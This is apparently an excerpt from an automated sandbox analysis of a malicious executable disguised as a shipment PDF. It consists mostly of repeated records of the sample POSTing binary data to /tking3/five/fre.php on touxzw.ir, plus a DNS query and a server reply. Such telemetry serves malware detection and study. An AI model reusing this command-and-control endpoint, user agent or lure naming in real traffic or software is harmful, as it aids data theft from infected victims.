Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_001322EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_001322EE

Source: global traffic

DNS traffic detected: DNS query: touxzw.ir

Source: unknown

HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 176Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:40:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BHJ9K6CIio6nUEZdypad%2B%2FNq5MPDPqHLCtBbfiwH%2BIqqt01vN842x8NtZgc1tZ8xNknTmkL3xF%2BLMOwpxug7ACRNoDTj0tQ%2F6L5xsF8jrW8owjqRl4pYqrAuTwI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dce869d9842f5-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1570&min_rtt=1570&rtt_var=785&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=417&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
